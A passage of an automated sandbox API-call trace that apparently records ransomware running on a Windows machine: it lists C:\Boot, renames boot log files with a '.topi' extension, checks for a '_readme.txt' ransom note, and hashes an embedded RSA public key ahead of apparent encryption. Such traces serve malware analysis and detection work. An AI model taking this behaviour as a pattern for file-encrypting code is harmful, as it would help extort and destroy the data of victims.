(HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.081] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0091.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.081] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.081] PathFindFileNameW (pszPath="") returned="" [0091.081] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0091.081] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0091.081] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0091.081] FreeLibrary (hLibModule=0x75670000) returned 1 [0091.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0091.081] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0091.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0091.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.082] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0091.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.082] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.082] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.082] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0091.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.082] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0091.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.082] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0091.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.082] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0091.082] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.083] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0091.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0091.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.083] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0091.083] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d0 [0091.083] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=0) returned 1 [0091.083] CloseHandle (hObject=0x5d0) returned 1 [0091.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.083] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.topi" (normalized: "c:\\boot\\bcd.log1.topi")) returned 1 [0091.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0091.084] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0091.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0091.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.084] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0091.084] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d0 [0091.084] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=0) returned 1 [0091.084] CloseHandle (hObject=0x5d0) returned 1 [0091.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.085] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.topi" (normalized: "c:\\boot\\bcd.log2.topi")) returned 1 [0091.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0091.085] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0091.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0091.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.085] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0091.085] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d0 [0091.085] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=65536) returned 1 [0091.086] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0091.088] SetFilePointerEx (in: hFile=0x5d0, liDistanceToMove=0xffda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.088] ReadFile (in: hFile=0x5d0, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0091.092] SetFilePointer (in: hFile=0x5d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.092] ReadFile (in: hFile=0x5d0, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x10000, lpOverlapped=0x0) returned 1 [0091.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0091.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x3193e68 [0091.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0091.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0091.093] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0091.094] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0091.095] CryptHashData (hHash=0x31c7540, pbData=0x3193e68, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0091.095] CryptGetHashParam (in: hHash=0x31c7540, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0091.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x31a7300 [0091.095] CryptGetHashParam (in: hHash=0x31c7540, dwParam=0x2, pbData=0x31a7300, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x31a7300, pdwDataLen=0x9ccfa54) returned 1 [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.096] SetLastError (dwErrCode=0x0) [0091.096] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31a7300 | out: hHeap=0x680000) returned 1 [0091.097] CryptDestroyHash (hHash=0x31c7540) returned 1 [0091.097] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0091.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0091.098] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0091.098] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0091.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.098] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0091.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x99f52d8 [0091.099] SetFilePointer (in: hFile=0x5d0, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0091.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0091.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x31bc228 [0091.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dec0 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab40 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x31a7260 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x31ba840 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31ba828 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bb0c8 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x31a7300 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x31ba588 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31ba570 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bafa8 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf78 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf60 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31ba558 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x3112760 [0091.100] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x3112760, Size=0x218) returned 0x31ce460 [0091.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31be978 [0091.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf60 | out: hHeap=0x680000) returned 1 [0091.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0091.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ba558 | out: hHeap=0x680000) returned 1 [0091.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0091.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31be978 | out: hHeap=0x680000) returned 1 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31ba558 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x31118e8 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x31bab28 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x31a7320 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x31baf60 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x3111908 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefc8 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x31a72c0 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x31a72a0 [0091.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x3111918 [0091.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0091.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0091.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3111908 | out: hHeap=0x680000) returned 1 [0091.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf60 | out: hHeap=0x680000) returned 1 [0091.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31a7320 | out: hHeap=0x680000) returned 1 [0091.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31118e8 | out: hHeap=0x680000) returned 1 [0091.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ba558 | out: hHeap=0x680000) returned 1 [0091.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefc8 | out: hHeap=0x680000) returned 1 [0091.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0091.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce460 | out: hHeap=0x680000) returned 1 [0091.102] GetCurrentThreadId () returned 0x8c4 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x190) returned 0x99eceb0 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d430 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3176008 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31ba558 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e0e00 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f08 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x3149ab8 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x31118e8 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x3111908 [0091.102] 